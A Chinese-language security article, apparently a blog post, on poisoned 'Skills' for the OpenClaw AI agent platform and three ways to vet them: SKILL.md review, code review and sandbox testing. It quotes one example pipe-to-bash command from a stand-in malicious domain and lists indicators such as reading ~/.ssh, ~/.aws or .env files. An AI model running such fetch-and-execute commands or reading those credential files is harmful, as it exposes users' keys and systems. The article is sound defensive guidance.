正文内容
“装完这个Skill,我的API Key就没了。”
有人在论坛上发了这句话,底下跟了200多条回复。不是安慰,是“我也被坑过”。
这不是段子。2026年初,ClawHub上爆发了大规模技能投毒行动,攻击者批量上传伪装成加密货币工具、办公助手的恶意Skills,诱骗用户下载安装。安天将此次攻击命名为“利爪浩劫”。不到一个月,火绒又监测到虚假OpenClaw安装包在GitHub传播,本质是下载器,会云控下载窃密木马和反向代理。紧接着,npm上出现恶意包@openclaw-ai/openclawai,伪装成CLI工具,窃取SSH密钥、云凭证、AI配置,甚至浏览器会话。
攻击者的套路并不复杂,但每次都能得手。
第一招:SKILL.md——藏在文档里的钓鱼钩
SKILL.md是每个Skill的说明书,看起来人畜无害。但攻击者最擅长在这里动手脚。
他们怎么干?
在SKILL.md的“安装先决条件”“功能依赖配置”等章节,夹带恶意下载链接或命令。例如伪装成加密货币监控工具的Skill,文档里写着“请运行以下命令安装依赖”:
curl -sL https://恶意域名/setup.sh | bash
怎么识破?
安天AVL SDK引擎专门强化了对SKILL.md的解析能力,能提取其中的URL并与威胁情报库比对。手工审查时,重点检查两点:
- 是否包含
curl|wget+ 未知域名的组合 - 是否要求下载加密压缩包并提供解压密码
发现任何一条,直接弃用。
第二招:代码审查——肉眼扫雷
如果SKILL.md没问题,真正的炸弹可能埋在代码文件里。
- 向外部服务器发送数据
- 无理由读取
~/.ssh、~/.aws、.env - 对任何内容使用
base64解码 - 使用
eval()或exec() - 混淆代码(压缩、编码、控制流平坦化)
- 请求sudo/管理员权限
比如某“天气助手”Skill,正常功能是从天气API获取数据并发送到用户邮箱。但代码里还偷偷读取~/.clawdbot/.env——里面存的正是AI的API Key。
火绒的分析报告里有一个更隐蔽的案例:恶意下载器会检查鼠标是否移动、用户名是否为sandbox、是否运行在虚拟机中。检测到沙箱环境直接退出,让你根本看不到它在干什么。
审查时建议用skill-vetter这类自动化工具先扫一遍,再结合人工判断。北航团队开源的ClawGuard Auditor更进一步——采用“动静结合”架构,在技能运行前做静态分析,运行中实时监控,一旦检测到敏感操作立即接管。
第三招:沙箱测试——让恶意代码自己暴露
前两招都过了,还是不放心?丢进沙箱跑一遍。
沙箱是隔离环境,Skill在里面跑,就算有问题也伤不到真系统。绿盟的NSF-ClawGuard就支持与沙箱联动:可疑Skill先在沙箱里执行,系统实时监控其行为,再根据结果决定是否放行。
沙箱主要看什么?
- 是否向未知IP发送数据
- 是否试图访问敏感目录
- 是否执行非预期命令
发现任何异常,直接封禁。
怎么防?
ClawHub官方已下架大批恶意Skills,但仍有漏网。截至2月6日,平台共3498个Skills,历史恶意Skills至少1184个。
几条实用建议:
- 安装任何Skill前,先跑
skill-vetter扫一遍 - 拒绝来源不明的压缩包和加密脚本
- 敏感数据加密存储,定期轮换
- 限制OpenClaw权限,别用管理员跑
- 优先用阿里云等平台的一键部署方案,规避供应链风险
完整的恶意Skills检测规则和审计工具清单,在 钓鱼Skill 专题里有人整理好了。下个Skill安装前,花3分钟扫一遍,省得事后发帖“我也被坑了”。